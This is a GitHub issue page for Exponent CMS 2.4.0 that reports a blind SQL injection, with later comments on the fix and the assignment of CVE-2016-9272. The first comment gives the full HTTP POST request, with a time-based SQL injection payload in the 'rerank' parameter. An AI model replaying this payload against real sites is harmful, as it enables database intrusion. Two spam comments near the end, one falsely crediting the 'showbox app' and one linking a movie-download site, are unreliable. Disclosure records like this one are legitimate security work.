search

exponentcms / exponent-cms

Content Management, Simple.
exponentcms.org
GNU General Public License v2.0
60 stars 24 forks source link

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (4) #1437

Closed exponentcms closed 4 years ago

exponentcms commented 4 years ago

POST /exponent/ HTTP/1.1 Content-Length: 268 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://192.168.118.1:80/exponent/ Cookie: PHPSESSID=4b42cc8b7f69ebe1afdcbf4abbfee00b; adminer_key=cdeaea5d52a8f402a28bd04980a7851b Host: 192.168.118.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: /

action=manage_ranks&controller=container&lastpage=http://192.168.118.1/exponent/untitled&model=container&rerank%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&src=%40section1

exponentcms commented 4 years ago

Appears to be a duplicate of #1395

exponentcms commented 4 years ago

(from [fffb2038de4c603931b785a4c3ec69cfd06181ba]) fix sql injection security vulnerability; reported by Nicky [#1394 state:resolved] [#1395 state:resolved] https://github.com/exponentcms/exponent-cms/commit/fffb2038de4c603931b785a4c3ec69cfd06181ba

exponentcms commented 4 years ago

Hi Can you help me to apply for a CVEID this vulnerability?

exponentcms commented 4 years ago

Please visit http://cve.mitre.org/cve/request_id.html, I've not had much success since they've changed reporting methods from email submission to form submission.

exponentcms commented 4 years ago

Hi, I have successfully applied for a CVEID(CVE-2016-9272) for this SQL injection vulnerability.

Credit:Nicky of Tencent Security Platform Department

Thank you.

exponentcms commented 4 years ago

Hi, I've successfully applied for this SQL injection vulnerability. Credit goes to creators of showbox app. Here is the showbox homepage. Thanks!

exponentcms commented 4 years ago

Existing without the answers to the difficulties you’ve sorted out through this guide is a critical case, as well as the kind which could have badly affected my entire career if I had not discovered your website. Check also https://newestmovieshd.org/ios-no-jailbreak-download

exponentcms commented 4 years ago

Lighthouse URL: https://exponentcms.lighthouseapp.com/projects/61783/tickets/1394